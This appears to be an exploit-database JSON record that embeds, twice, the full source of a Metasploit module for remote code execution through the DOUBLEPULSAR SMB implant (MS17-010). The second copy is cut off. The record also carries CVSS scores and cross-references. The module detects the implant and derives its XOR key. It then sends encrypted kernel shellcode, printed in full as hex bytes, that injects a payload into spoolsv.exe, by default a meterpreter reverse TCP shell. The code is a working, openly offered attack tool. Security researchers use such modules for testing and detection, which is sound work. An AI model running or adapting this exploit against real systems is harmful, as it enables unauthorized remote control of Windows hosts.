["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:24:02", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-29T22:24:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-01] #"}, "lastseen": "2021-09-30T22:14:19", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "a7f14c2d4158f8362b582a31323f2628", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-01T22:16:45", "history": [], "viewCount": 111, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-29T22:24:02", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-29T22:24:02", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 